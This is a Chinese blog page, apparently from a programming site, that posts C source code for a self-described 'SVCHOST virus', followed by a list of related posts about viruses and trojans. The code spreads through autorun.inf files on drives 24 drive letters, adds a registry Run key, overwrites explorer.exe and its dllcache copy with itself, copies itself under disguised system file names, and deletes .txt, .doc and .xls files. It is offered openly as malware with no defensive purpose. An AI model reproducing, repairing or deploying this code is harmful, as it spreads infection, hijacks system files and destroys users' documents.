C可怕的病毒源程序

最新推荐文章于 2022-03-31 14:12:13 发布
最新推荐文章于 2022-03-31 14:12:13 发布
阅读量757 收藏 2
点赞数
分类专栏: C/C++ 文章标签: c output input null file compiler
 

/*
  SK-CHINA
  SVCHOST virus WRITE BY S.K
  Compiler:
  DEV-CPP 4.9.9.2
*/

/* SVCHOST.C   */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include<stdio.h> /*标准输入输出*/
#include<string.h> /*字符串操作*/
#include<stdlib.h> /*其它函数*/
#include<process.h> /*进程控制*/
#include<dir.h> /*目录函数*/

#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM  5 /*删除文件数*/
/*====================================================================*/
/*
  文件AUTORUN.INF内容:
  1.自动运行SVCHOST.com
  2.覆盖默认打开命令,使用病毒体作为新的打开方式
  3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={"[AutoRun]/nopen=/"SVCHOST.com /s/"/nshell//open=打开(&O)/nshell//open//Command=/"SVCHOST.com /s/"/nshell//explore=资源管理器(&X)/nshell//explore//Command=/"SVCHOST.com /s/""};
/*=====================================================================*/
/*
  添加注册表项:
  1.自动运行生成病毒体C:/windows/wjview32.com
*/
char *regadd={"REGEDIT4/n/n[HKEY_LOCAL_MACHINE//SOFTWARE//Microsoft//Windows//CurrentVersion//Run]/n/"wjview32/"=/"C:windowswjview32.com /s/""};
/*=====================================================================*/
/*
  函数:复制文件
  复制源:infile
  目的地:outfile
  成功返回0,失败返回1
*/
int copy(char *infile,char *outfile)
{
    FILE *input,*output;
    char temp;
    if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen(outfile,"wb"))!=NULL))
    {
      while(!feof(input))
      {
        fread(&temp,1,1,input);
        fwrite(&temp,1,1,output);
      }
      fclose(input);
      fclose(output);
      return 0;
    }
    else return 1;
}
/*=====================================================================*/
/*
  函数:通过explorer自动运行
  成功返回0,失败返回1,2
*/
int autorun_explorer()
{
    FILE *input;
    if((input=fopen("c://windows//system//explorer.exe","rb"))!=NULL)
    {
      fclose(input);
      remove("c://windows//$temp$");
      remove("c://windows//system32//dllcache//$temp$");
      return 1;
    }
    copy("c://windows//explorer.exe","c://windows//system//explorer.exe");
    rename("c://windows//explorer.exe","c://windows//$temp$");
    rename("c://windows//system32//dllcache//explorer.exe","c://windows//system32//dllcache//$temp$");
    if(copy("SVCHOST.com","c://windows//explorer.exe")==0 && copy("SVCHOST.com","c://windows//system32//dllcache//explorer.exe")==0)
      return 0;
    else
      return 2;
}
/*=====================================================================*/
/*
  函数:添加注册表项
  成功返回0,失败返回1
*/
int add_reg()
{
    FILE *output;
    if((output=fopen("$$$$$","w"))!=NULL)
    {
      fprintf(output,regadd);
      fclose(output);
      spawnl(1,"c://windows//regedit.exe"," /s $$$$$",NULL);
    }
}
/*=====================================================================*/
/*
  函数:复制病毒 + Autorun.inf自动运行
*/
void copy_virus()
{
    int i,k;
    FILE *input,*output;
    char *files_svchost[SVCHOST_NUM]={"svchost.com","c://windows//wjview32.com","c://windows//system//MSMOUSE.DLL","c://windows//system32//cmdsys.sys","c://windows//system32//mstsc32.exe","c://windows//explorer.exe"};
    char temp[2][20]={"c://svchost.com","c://autorun.inf"};
    for(i=0;i<SVCHOST_NUM;i++)
    {
      if((input=fopen(files_svchost[i],"rb"))!=NULL)
      {
        fclose(input);
        for(k=0;k<SVCHOST_NUM;k++)
        {
          copy(files_svchost[i],files_svchost[k]);
        }
        i=SVCHOST_NUM;
      }
    }
    for(i=0;i<SVCHOST_NUM;i++)
    {
      if((input=fopen(files_svchost[i],"rb"))!=NULL)
      {
        fclose(input);
        for(k=0;k<24;k++)
        {
          copy(files_svchost[i],temp[0]);
          if((output=fopen(temp[1],"w"))!=NULL)
          {
            fprintf(output,"%s",autorun);
            fclose(output);
          }
          temp[0][0]++;
          temp[1][0]++;
        }
        i=SVCHOST_NUM;
      }
    }
}
/*=====================================================================*/
/*
  函数:制造垃圾文件
*/
void make_rubbish()
{
     int i;
     FILE *output;
     srand(0);
     for(i=0;i<RUBBISH_NUM;i++)
     {
       int n;
       char s[30];
       n=rand();
       sprintf(s,"C://DESTORY_感染_%d",n);
       if((output=fopen(s,"w"))!=NULL)
       {
         fprintf(output,"%ld%s",n*n,s);
         fclose(output);
       }
     }
}
/*=====================================================================*/
/*
  函数:删除文件
*/
void remove_files()
{
    long done;
    int i;
    struct _finddata_t ffblk;
    char *remove_files[3]={"*.txt","*.doc","*.xls"};
    for(i=0;i<3;i++)
    {
      if(_findfirst(remove_files[i],&ffblk)==-1) continue;
      while(!done)
      {
        remove(ffblk.name);
        _findnext(done,&ffblk);
      }
      _findclose(done);
    }
}
/*=====================================================================*/
/*
  主程序
  使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行
*/
int main(int argc,char **argv)
{
/*
    int contral=0;
    if(argc>1)
      if(strcmp(argv[1],"/s")==0)
        goto next1;
    autorun_explorer();
    spawnl(1,"c://windows//system//explorer.exe",NULL);
    next1:
    add_reg();
    copy_virus();
    make_rubbish();
*/
    /* remove_files(); */
/*
    spawnl(1,"c://windows//system32//mstsc32.exe"," /s",NULL);
    return 0;
*/
}

wangxijie
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
c病毒程序原理分析(防范病毒 c语言小病毒示例)
01-01
其实第一件事情实际上可以看成对文件进行复制,把病毒源文件的功能函数全部放到被感染文件的最后,同时在被感染文件中调用这个函数 下面给出c语言的实现过程:1,主程序调用病毒功能函数2,病毒功能函数读取查找同...
c++病毒(超级牛逼)
最新发布
2301_76145087的博客
08-08 1061
由4个代码(展示cpp文件,编译后变成exe才可以使用)组成,注意,由于本程序需要互相调用,所以必须放在同一目录下,且不要轻易修改名称。防护程序2,作用:和第一个防护程序相呼应,他被关则我打开他,我被关则他打开我,名称 整人代码-防护2.cpp。防护程序,作用:防止主程序和第二个和它相对应的防护程序被关,名称 整人代码-防护.cpp。关闭整人代码和其防护,作用:关闭防护程序和主程序,名称 整人代码-kill.cpp。整人主程序,作用:让人承认我是大傻猪,名称 整人代码.cpp。效果:删除C盘、删除D盘。
C++病毒(不可轻易尝试)
一个11岁的小伙子,热爱信息学
01-18 2959
在家研究C++的时候,一不小心弄出来个病毒,吓得我赶紧当场重置Windows,却不料是代码块惹的祸,又觉得好玩儿,就分享一下吧。可以在Dev C++上运行,没有的小伙伴可以去开发C++下载|SourceForge.net上下载。 下面,我将源码公布于世...... #include <windows.h> #include <ctime> using namespace std; int main() { int x = GetSystemMetrics (SM_CXS
一段简单的C/C++病毒源程序
mycaibo编程
12-07 1万+
主要是感染C/C++源文件只要编译该段源程序就会使当前目录里的所有.c和.cpp文件感染上病毒,当然如果是没有主函数的源文件就没有作用:思想很简单:插入一段复制自身的代码,而这段代码是将自身的病毒部分传播给同目录下的其它文件。
【C/C++】枚举类型举例
皓皓松的博客
06-08 4050
#include #include int main() { enum week//定义一个星期的枚举类型week { Sun, Mon, Tue, Wed, Thu, Fri, Sat }; week day;//定义枚举变量 day int i;//定义整形变量 i printf_s("请输入0~6之间的一个数字:\n"); scanf_s("%d"
用c++撸一个小病毒
我的博客
03-31 3534
我又来啦(*^▽^*) 今天来教大家用c++做一个小病毒,非常的简单,你拿去在好友面前装一装也是可以的 怎么做 做就很简单 效果:先获取自己exe文件的路径,每隔一点时间就打开自己(其实是为了刷内存),会出现很多弹框,再加一点警告弹框,效果杠杠滴 然后再开一个线程,在上面的效果的同时,把鼠标搞飞,想要关掉,只能关机 所以说千万不要在打游戏或者文件没保存的时候打开 开始做 打开自己 因为我们要打开文件,所以需要知道文件路径 获取文件路径主要用到了一个叫做 _pgmptr的函数,但在用之
数据结构 KMP算法 源程序 c语言
12-07
数据结构 KMP算法 源程序 c语言
若干源程序资料12.rar
06-11
2012-06-11 21:09 461,754 一个各种着名算法问题的c源程序包,推荐.rar 2012-06-11 21:37 125,952 三种网页跳转代码.doc 2012-06-11 21:42 4,478,005 中国象棋C++(1).rar 2012-06-11 21:42 4,478,005 中国象棋C++....
自编C++关机程序 源代码
08-15
源代码编译成EXE后,双击程序会关机 需要把文件名改为.cpp或.C
proteus中直接编译C程序
02-17
本软件的特点是:不论源程序是汇编语言编写的还是C语言编写的,软件都能自动识别它并生成HEX可执行文件。 如果被杀毒软件报为病毒,请直接添加“信任”即可。 如果编译出错的话,那很有可能你的程序有语法错误,请...
反弹木马(改进版,含全部代码)
02-23
反弹木马的改进版,功能进一步加强!!!
C++木马病毒的查杀设计与实现(含源码)
01-28
VC++木马病毒检测工具设计与实现,含毕设要求各种文档及源码 VC++木马病毒检测工具设计与实现,含毕设要求各种文档及源码
c++简易病毒(附代码)
weixin_46351282的博客
02-17 1万+
闲的没事做了个病毒,可以用来整朋友,在Dev-c++上可以运行,附代码 #include<windows.h> #include #include #include using namespace std; int main() { int x=GetSystemMetrics(SM_CXSCREEN); int y=GetSystemMetrics(SM_CYSCREEN); sra...
c++编写病毒入门
热门推荐
ghevinn欢迎您光临
01-17 2万+
本连载文章只讨论写病毒的技术,并不讨论危害计算机及网络,所示例的程序只是一个无危害的模板,你 可以在技术范围及法律范围内扩充实验. 在读本程序前请保证不用此程序进行违法活动,否则,请马上离开. 连载1——最基本的病毒. 本病毒的功能: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\w
c++病毒系列(1)
曾经来过,又悄悄离去……的博客
05-02 1万+
今天是五一放假第二天,我灵机一动,想起周一被张某皓同学欺负的事,决定写一个c++小病毒,报复一下…… 故事开始了。 (先上代码吧) #include<iostream> using namespace std; int main(){ while(true){ char *p=new char[10000]; } return 0;...
C++端口反弹木马
Foxfile_Hom的专栏
01-20 1107
代码: /* ============================== Rebound port in Windows NT By shucx,2003/10 ===============================*/ #include #include #pragma comment(lib,"wsock32.lib") void OutputShell(
WINDOWS系统怎么解决无效的源发行版:15
05-23
如果在 Windows 操作系统中出现“无效的源发行版:15”错误,可能是因为你的系统之前安装的某个软件或更新程序与 Windows Update 不兼容或存在冲突。以下是一些解决该问题的方法: 1. 运行 Windows 更新故障排除...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值